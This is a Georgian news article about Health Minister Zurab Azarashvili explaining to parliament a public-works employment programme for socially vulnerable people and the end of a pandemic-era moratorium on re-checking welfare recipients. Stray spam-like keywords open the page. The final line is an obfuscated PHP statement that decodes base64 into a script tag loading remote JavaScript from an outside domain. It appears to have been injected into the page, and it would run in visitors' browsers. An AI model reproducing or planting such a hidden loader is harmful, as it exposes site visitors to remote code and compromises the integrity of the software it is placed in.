celsiusi
ავერსი შნაიდერი
სოციალურად დაუცველი პირების საზოგადოებრივ სამუშაოებზე დასაქმების პროგრამა მნიშვნელოვანია, რათა გამოცხადებული მორატორიუმიდან მოხდეს ძალიან მსუბუქად და უმტკივნეულოდ გამოსვლა, – აღნიშნულის შესახებ ჯანდაცვის მინისტრმა, ზურაბ აზარაშვილმა პარლამენტში სიტყვით გამოსვლისას განაცხადა.
 
მინისტრმა იმ მიზეზებზე ისაუბრა, თუ რატომ არის გაზრდილი სოციალური შემწეობის მიმღებ პირთა მაჩვენებელი.
 
ზურაბ აზარაშვილმა აღნიშნა, რომ 2020 წლის მარტიდან, სოციალურად დაუცველების გადამოწმებაზე, მორატორიუმი გამოცხადდა და შესაბამისად, აღარ ხდებოდა შემწეობის მიმღები პირების გადამოწმება. ასევე, გამარტივდა სოციალურად დაუცველის სტატუსის მინიჭების პროცედურაც.
 
„2020 წლამდე დაახლოებით, 440 ათასი სოციალურად დაუცველი გვყავდა ბაზაში და 200 000-ზე მეტი სწორედ მორატორიუმის გამო დაემატა. დასაქმების პროგრამის დაწყების ძირითადი მიზეზი კი სოციალურად დაუცველი შრომისუნარიანი პირების, დასაქმების კუთხით გააქტიურებაა. ვეხმარებით მათ, რომ თავისი შესაძლებლობები, კვალიფიკაცია და უნარები, რაიმე სახით, აიმაღლონ. თუ ადამიანი, ჩვენი შეთავაზებიდან ერთ-ერთს აირჩევს, ოთხი წლის განმავლობაში მას და მის ოჯახს არ გადავამოწმებთ, ხოლო ვინც უარს იტყვის ამ შეთავაზებებიდან ნებისმიერზე, მაშინ უკვე, 2023 წლის პირველი მარტიდან გვექნება სამართლიანი და სრული ლეგიტიმური უფლება, რომ ჩვენ მათი სოციალური მდგომარეობა გადავამოწმოთ“, – განაცხადა ზურაბ აზარაშვილმა.
 
შეგახსენებთ, რომ პანდემიის პირობებში, სოციალურად დაუცველი პირების გადამოწმებაზე მორატორიუმი გამოცხადდა. რის შედეგადაც ოჯახებს სარეიტინგო ქულა და სოციალური დახმარება გარანტირებულად უნარჩუნდებოდათ. აქედან გამომდინარე, იზრდება საარსებო შემწეობის მიმღებთა რაოდენობა, რადგან მორატორიუმის გამო, სისტემიდან უკვე არსებული ოჯახების გადინება შეჩერდა. ოკუპირებული ტერიტორიებიდან დევნილთა, შრომის, ჯანმრთელობისა და სოციალური დაცვის მინისტრი, პარლამენტში ინტერპელაციის წესით წარსდგა.
 
 
 
 
424
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");